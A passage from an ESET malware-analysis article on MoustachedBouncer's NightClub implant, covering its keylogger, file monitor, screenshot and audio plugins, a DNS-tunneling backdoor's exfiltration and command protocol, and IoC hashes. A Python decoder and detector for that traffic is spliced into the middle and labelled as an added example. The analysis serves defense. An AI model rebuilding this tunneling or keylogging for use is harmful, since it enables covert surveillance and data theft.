NightClub keylogger\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">19<\/span><\/em><span lang=\"EN-US\"><em>. NightClub keylogger<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The keylogger maintains a cleartext log file in <span>%TEMP%uirtl.tmp<\/span>. It contains the date, the title of the application, and the logged keystrokes for this specific application. 
An example, which we generated, is provided in Figure 20.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 20. Example of the output of the keylogger (generated by us)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-20.png\" title=\"Figure 20. Example of the output of the keylogger (generated by us)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">20<\/span><\/em><span lang=\"EN-US\"><em>. Example of the output of the keylogger (generated by us)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h5>File monitor (SHA-1: 6E729E84C7672F048ED8AE847F20A0219E917FA)<\/h5>\n<p>This plugin was stored in <span>%APPDATA%NvmFiltersTUlsWa1.cr<\/span> and is a DLL with a single export named Starts. Its PDB path, <span>D:ProgrammingProjectsAutogenKhAutogenAlgReleasex64FileMonitoringModule.pdb<\/span>, has not been stripped, and it reuses code from the 2014 and 2020 file monitors, described above. It monitors drives and recent files, and copies files for exfiltration to <span>%TEMP%AcmSymrm<\/span>. Its log file is stored in <span>%TEMP%indexwti.sxd.<\/span><\/p>\n<h4>NightClub \u2013 2020\u20132022<\/h4>\n<p>In 2020-11, we observed a new version of NightClub deployed in Belarus, on the computers of the diplomatic staff of a European country. In 2022-07, MoustachedBouncer again compromised some of the same computers. The 2020 and 2022 versions of NightClub are almost identical, and the compromise vector remains unknown.<\/p>\n<p>Its architecture is slightly different from the previous versions, as the orchestrator also implements networking functions. The second component, which its developers call the module agent, is only responsible for loading the plugins. All samples were found in the folder <span>%APPDATA%microsoftdef<\/span> and are written in C++ with statically linked libraries such as CSmtp or cpprestsdk. 
As a result, the executables are quite large \u2013 around 5MB.<\/p>\n<h5>Orchestrator<\/h5>\n<p>On the victims\u2019 machines, both orchestrator variants (SHA-1: <span>92115E21E565440B1A26ECC20D2552A214155669<\/span> and <span>D14D9118335C9BF6633CB2A41023486DACBEB052<\/span>) were named <span>svhvost.exe<\/span>. We believe MoustachedBouncer tried to masquerade as the name of the legitimate executable <span>svchost.exe<\/span>. For persistence, it creates a service named <span>vAwast<\/span>.<\/p>\n<p>Contrary to previous versions, to encrypt the strings they simply add <span>0x01<\/span> to each byte. For example, the string <span>cmd.exe<\/span> would be encrypted as <span>dne\/fyf<\/span>. Another difference is that the configuration is stored in an external file, rather than hardcoded in the binary. It is stored in the hardcoded path <span>%APPDATA%MicrosoftdefGfr45.cfg<\/span> and the data is decrypted with a private 2048-bit RSA key (see Figure 21) using the function <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/bcrypt\/nf-bcrypt-bcryptimportkeypair\"><em>BCryptImportKeyPair<\/em><\/a> and <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/bcrypt\/nf-bcrypt-bcryptdecrypt\"><em>BCryptDecrypt<\/em><\/a>.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 21. Hardcoded private RSA key\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-21.png\" title=\"Figure 21. Hardcoded private RSA key\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">21<\/span><\/em><span lang=\"EN-US\"><em>. Hardcoded private RSA key<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The config is formatted in JSON, as shown in Figure 22. <\/p>\n<figure><img decoding=\"async\" alt=\"Figure 22. NightClub external configuration format\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-22.png\" title=\"Figure 22. 
NightClub external configuration format\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">22<\/span><\/em><span lang=\"EN-US\"><em>. NightClub external configuration format<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The most important keys are <span>transport<\/span> and <span>modules<\/span>. The former contains information about the mailbox used for C&amp;C communications, as in the previous versions. The latter contains the list of modules.<\/p>\n<h5>Module agent<\/h5>\n<p>The two variants of the module agent (SHA-1: <span>DE0B38E12C0AF0FD63A67B03DD1F8C1BF7FA6128<\/span> and <span>E6DE72516C1D4338D7E45E028340B54DCDC7A8AC<\/span>) were named <span>schvost.exe<\/span>, which is another imitation of the <span>svchost.exe<\/span> filename.<\/p>\n<p>This component is responsible for starting the modules that are specified in the configuration. They are DLLs, each with an export named <span>Start <\/span>or <span><span>Starts<\/span><\/span>. They are stored on disk unencrypted with the <span>.ini<\/span> extension, but actually are DLLs<span>.<\/span><\/p>\n<h5>Modules<\/h5>\n<p>Over the course of our investigation, we found five different modules: an audio recorder, two almost identical screenshotters, a keylogger, and a DNS backdoor. For all of them: their configuration, which is formatted in JSON, is passed as an argument to the <span>Start <\/span>or<span><br \/>\n<span>Starts<\/span><\/span> function.<\/p>\n<p>By default, the output of the plugin is written in <span>%TEMP%tmp123.tmp<\/span>. This can be changed using the config field <span>file<\/span>. Table 3 shows the different plugins.<\/p>\n<p><em>Table 3. 
NightClub plugins<\/em><\/p>\n<p><em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"142\">\n<p><strong><span lang=\"EN-US\">DLL export name<\/span><\/strong><\/p>\n<\/td>\n<td width=\"273\">\n<p><strong><span lang=\"EN-US\">Configuration<\/span><\/strong><\/p>\n<\/td>\n<td width=\"205\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">NotifyLoggers.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;chk_t&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;r_d&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;f_hs&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;t_hs&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">An audio recorder that uses the <a href=\"https:\/\/en.wikipedia.org\/wiki\/LAME\"><em><span>Lame<\/span><\/em><\/a> library, and <\/span><span><span lang=\"EN-US\">mciSendStringW<\/span><\/span><span lang=\"EN-US\"> to control the audio device. 
The additional configuration fields are likely used to specify options for Lame.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">MicroServiceRun.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;<br \/><span><br \/>\n<\/span>&#8220;capture_on_key_press&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;period_in_sec&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;quality&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;app_keywords&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A screenshotter that uses <\/span><span><span lang=\"EN-US\">CreateCompatibleDC<\/span><\/span><span lang=\"EN-US\"> and <\/span><span><span lang=\"EN-US\">GdipSaveImageToStream<\/span><\/span><span lang=\"EN-US\"> and writes captured images in <\/span><span><span lang=\"EN-US\">file<\/span><\/span><span lang=\"EN-US\"> to disk. 
If <\/span><span><span lang=\"EN-US\">app_keywords<\/span><\/span><span lang=\"EN-US\"> is not empty, it uses <\/span><span><span lang=\"EN-US\">GetForegroundWindow<\/span><\/span><span lang=\"EN-US\"> to check the name of the active Window and capture it only if it matches <\/span><span><span lang=\"EN-US\">app_keywords<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">JobTesterDll.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A keylogger that uses the <\/span><span><span lang=\"EN-US\">GetKeyState<\/span><\/span><span lang=\"EN-US\"> API. 
It writes the log in <\/span><span><span lang=\"EN-US\">file<\/span><\/span><span lang=\"EN-US\"> to disk and the format is <\/span><span><span lang=\"EN-US\">&lt;Date&gt;&lt;Title bar&gt;&lt;content&gt;<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">ParametersParserer.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;cc_server_address&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A DNS-tunneling backdoor. <\/span><span><span lang=\"EN-US\">cc_server_address<\/span><\/span><span lang=\"EN-US\"> specifies the IP address of a DNS server to which requests are sent. More details follow.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/em><\/p>\n<p>The DNS-tunneling backdoor (<span>ParametersParserer.dll<\/span>) uses a custom protocol to send and receive data from a malicious DNS server (<span>cc_server_address<\/span>). Figure 23 shows that the DNS request is sent to the IP address provided in the configuration, using the <span>pExtra<\/span> parameter of <span>DnsQuery_A<\/span>.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 23. 
DNS request to the C&amp;C server\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2022-plugin-dns-request.png\" title=\"Figure 23. DNS request to the C&amp;C server\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">23<\/span><\/em><span lang=\"EN-US\"><em>. DNS request to the C&amp;C server<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The plugin adds the data to exfiltrate as part of the subdomain name of the domain that is used in the DNS request (<span>pszName<\/span> above). The domain is always <span>11.1.1.cid<\/span> and the data is contained in the subdomain. It uses the following format, where <span>x<\/span> is the letter, not some variable:<\/p>\n<p><span>x + &lt;modified base64(buffer)&gt; + x.11.1.1.cid<\/span><\/p>\n<p>For example, the first DNS request the plugin sends is <span>xZW1wdHkx.11.1.1.cid<\/span>, where <span>ZW1wdHk<\/span> decodes to <span>empty<\/span>. <\/p>\n<p>Note that the base64 function is not standard. It removes the <span>=<\/span>, if any, from the result of the base64 encoding, and also replaces <span>\/ <\/span>characters with <span>-s<\/span> and <span>+<\/span> characters with <span>-p<\/span>. This is to create valid subdomains, because standard base64 encoding output can include <span>+<span>, \/<\/span><br \/>\n<\/span>and<span><br \/>\n<span>=<\/span><br \/>\n<\/span>characters, all of which are invalid in domain names and could be detected in network traffic.<\/p>\n<p>Then, the plugin reads the result that should be one or many TXT DNS records, since the flag <span>DNS_TYPE_TEXT<\/span> is passed to <span>DnsQuery_A<\/span>. Microsoft names the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/windns\/ns-windns-dns_txt_dataa\"><em>underlying structure DNS_TXT_DATAA<\/em><\/a>. It contains an array of strings, which are concatenated to compute the output buffer.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 24. 
The plugin reads the TXT record\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2022-dns-data-txt-1.png\" title=\"Figure 24. The plugin reads the TXT record\" width=\"\"><figcaption>\n<p><em><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">24<\/span><\/em><span lang=\"EN-US\"><em>. The plugin reads the TXT record<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The expected format of the reply is:<\/p>\n<p><span>x + &lt;argument encoded with modified base64&gt; + x.&lt;cmd_id&gt;.&lt;unknown integer&gt;.1.&lt;cmd_name&gt;<\/span><\/p>\n<p>This is similar to the format of the requests. The <span>&lt;argument encoded with modified base64&gt;<\/span> also uses the custom base64 encoding without <span>=<\/span> and with <span>-p<\/span> for <span>+<\/span> and <span>-s<\/span> for <span>\/<\/span>. <span>&lt;cmd_name&gt;<\/span> is an arbitrary string that is not used by the backdoor; it\u2019s likely used by the operators to keep track of the different commands. <span>&lt;cmd_id&gt;<\/span> is an integer that corresponds to a command in the backdoor <span>switch<\/span> statement. <\/p>\n<p>For example, if the operators wanted to execute <span>calc.exe<\/span>, the DNS C&amp;C server would send the reply <span>xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc<\/span>, where <span>Yzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQ<\/span> decodes to <span>c:windowssystem32calc.exe<\/span> and <span>27<\/span> is the command ID to create a new process. All commands supported by this backdoor are detailed in Table 4.<\/p>\n<p><em>Table 4. 
Commands implemented by the DNS backdoor<\/em><\/p>\n<p><em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"75\">\n<p><strong><span lang=\"EN-US\">ID<\/span><\/strong><\/p>\n<\/td>\n<td width=\"546\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x15<\/span><\/span><span lang=\"EN-US\"> (21)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Copy a directory (from a source to a destination)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x16<\/span><\/span><span lang=\"EN-US\"> (22)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Move a file (from a source to a destination)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x17<\/span><\/span><span lang=\"EN-US\"> (23)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Remove a file or a directory<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x18<\/span><\/span><span lang=\"EN-US\"> (24)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Search a file for a given pattern (Note: we are unsure about the exact behavior of this command)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x19<\/span><\/span><span lang=\"EN-US\"> (25)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Write a buffer to a file<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x1A<\/span><\/span><span lang=\"EN-US\"> (26)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Read a file<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x1B<\/span><\/span><span lang=\"EN-US\"> (27)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Create a 
process<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/em><\/p>\n<p>The result of the commands is exfiltrated back to the attacker using DNS requests, as detailed above. The only difference is that <span>11<\/span> is replaced by <span>12<\/span> in the domain name, as shown in this example: <span>xdGltZW91dAx.12.1.1.cid<\/span>. In this case, the plugin sent the message timeout to the C&amp;C server.<\/p>\n<h2>Conclusion<\/h2>\n<p>MoustachedBouncer is a skilled threat actor targeting foreign diplomats in Belarus. It uses quite advanced techniques for C&amp;C communications including network interception at the ISP level for the Disco implant, emails for the NightClub implant, and DNS in one of the NightClub plugins.<\/p>\n<p>The main takeaway is that organizations in foreign countries where the internet cannot be trusted should use an end-to-end encrypted VPN tunnel to a trusted location for all their internet traffic in order to circumvent any network inspection devices.<\/p>\n<blockquote>\n<p>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.<br \/>ESET Research offers private APT intelligence reports and data feeds. 
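The DNS tunneling format of the NightClub plugin described above (the modified base64, the x…x label, the 11/12 request domains and the reply layout) is regular enough to detect and decode from DNS logs. The following Python is an added example, not ESET's code or a NightClub component: it implements the custom base64 both ways, parses query names and TXT replies into structured messages, and scans a constructed DNS query log (labelled as such; the log format is an assumption) for tunnel traffic. The test vectors are the three examples the page gives. The regular expressions are written to the format as described and tolerate a trailing dot on fully qualified names; the command table mirrors Table 4.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed DNS query log (not real telemetry). Assumed format: "<client> <qname> <qtype>".
SAMPLE_DNS_LOG = """\
10.0.0.5 xZW1wdHkx.11.1.1.cid TXT
10.0.0.5 www.example.com A
10.0.0.5 xdGltZW91dAx.12.1.1.cid TXT
10.0.0.7 mail.example.org MX
"""

# Command IDs from Table 4 on this page.
COMMAND_NAMES = {21: "copy directory", 22: "move file", 23: "remove file or directory",
                 24: "search file for pattern", 25: "write buffer to file",
                 26: "read file", 27: "create process"}


def nightclub_b64_decode(text: str) -> bytes:
    """Undo the plugin's base64 variant: '-p' -> '+', '-s' -> '/', padding restored."""
    std = text.replace("-p", "+").replace("-s", "/")
    std += "=" * (-len(std) % 4)
    return base64.b64decode(std, validate=True)


def nightclub_b64_encode(data: bytes) -> str:
    """The plugin's encoding; handy for building detection test vectors."""
    return base64.b64encode(data).decode().rstrip("=").replace("+", "-p").replace("/", "-s")


@dataclass
class TunnelMessage:
    direction: str            # "request" (11.1.1.cid), "result" (12.1.1.cid) or "reply" (TXT)
    payload: bytes
    cmd_id: Optional[int] = None
    cmd_name: Optional[str] = None

    @property
    def command(self) -> Optional[str]:
        return COMMAND_NAMES.get(self.cmd_id) if self.cmd_id is not None else None


# Client -> server: x + data + x . (11|12) . 1 . 1 . cid
_REQUEST_RE = re.compile(r"^x([A-Za-z0-9-]+)x\.(11|12)\.1\.1\.cid$")
# Server -> client TXT: x + data + x . <cmd_id> . <unknown int> . 1 . <cmd_name>
_REPLY_RE = re.compile(r"^x([A-Za-z0-9-]+)x\.(\d+)\.(\d+)\.1\.([^.]+)$")


def parse_query_name(qname: str) -> Optional[TunnelMessage]:
    """Recognise a tunnel request or result in a DNS query name, else None."""
    m = _REQUEST_RE.match(qname.rstrip("."))
    if not m:
        return None
    try:
        payload = nightclub_b64_decode(m.group(1))
    except (binascii.Error, ValueError):
        return None
    return TunnelMessage("request" if m.group(2) == "11" else "result", payload)


def parse_txt_reply(txt: str) -> Optional[TunnelMessage]:
    """Parse a C&C reply carried in a TXT record, else None."""
    m = _REPLY_RE.match(txt)
    if not m:
        return None
    try:
        payload = nightclub_b64_decode(m.group(1))
    except (binascii.Error, ValueError):
        return None
    return TunnelMessage("reply", payload, cmd_id=int(m.group(2)), cmd_name=m.group(4))


def scan_dns_log(log: str) -> List[str]:
    """One alert line per tunnel query found in the log text."""
    alerts = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        client, qname, _qtype = parts
        msg = parse_query_name(qname)
        if msg is not None:
            alerts.append(f"{client} {msg.direction} {msg.payload.decode('latin-1')!r}")
    return alerts
```

In practice the fixed `11.1.1.cid` / `12.1.1.cid` suffix is the cheapest indicator to alert on, and decoding the label tells the analyst what left the host (the result of a command) without needing the malware itself.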
For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\">ESET Threat Intelligence<\/a> page.<\/p>\n<\/blockquote>\n<h2>ESET Research Podcast<\/h2>\n<p>If you want to know how ESET researchers named MoustachedBouncer and its tools Disco and NightClub, what makes this group worthy of the \u201cadvanced\u201d label, or if employees of the targeted embassies could have brought the malware home from work, then listen to the latest episode of the ESET Research podcast. ESET\u2019s Director of Threat Research Jean-Ian Boutin explains the intricacies of MoustachedBouncer to our host and ESET Distinguished Researcher <a href=\"https:\/\/www.welivesecurity.com\/author\/goretsky\/\">Aryeh Goretsky<\/a>. If you enjoy listening to cybersecurity topics, subscribe to our ESET Research podcast on <a href=\"https:\/\/open.spotify.com\/show\/1WDjY2A3A3s5FKycrOVkhg\">Spotify<\/a>, <a href=\"https:\/\/podcasts.google.com\/feed\/aHR0cHM6Ly9mZWVkLnBvZGJlYW4uY29tL2VzZXRyZXNlYXJjaC9mZWVkLnhtbA\">Google Podcasts<\/a>, <a href=\"https:\/\/podcasts.apple.com\/us\/podcast\/eset-research-podcast\/id1596306608\">Apple Podcasts<\/a>, or <a href=\"https:\/\/esetresearch.podbean.com\/\">PodBean<\/a>.<\/p>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"622\">\n<tbody>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">SHA-1<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Filename<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Detection<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span 
lang=\"EN-US\">02790DC4B276DFBB26C714F29D19E53129BB6186<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">index.html<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JS\/TrojanDownloader.Agent.YJJ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Fake Windows update webpage.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6EFF58EDF7AC0FC60F0B8F7E22CFE243566E2A13<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">jdrop.js<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JS\/TrojanDownloader.Agent.YJJ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JavaScript code that triggers the download prompt of the fake Windows update.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">E65EB4467DDB1C99B09AE87BA0A964C36BAB4C30<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">MicrosoftUpdate845255.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.ET<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">3A9B699A25257CBD0476CB1239FF9B25810305FE<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">driverpackUpdate.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Runner.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. 
Executes PowerShell scripts.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">19E3D06FBE276D4AAEA25ABC36CC40EA88435630<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">DPU.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Runner.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Executes PowerShell scripts.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">52BE04C420795B0D9C7CD1A4ACBF8D5953FAFD16<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sdrive.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Exploit.CVE-2021-1732.I<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. LPE exploit for CVE-2021-1732.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0241A01D4B03BD360DD09165B59B63AC2CECEAFB<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">nod32update.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.EV<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Reverse proxy based on revsocks.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">A01F1A9336C83FFE1B13410C93C1B04E15E2996C<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">aact.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco 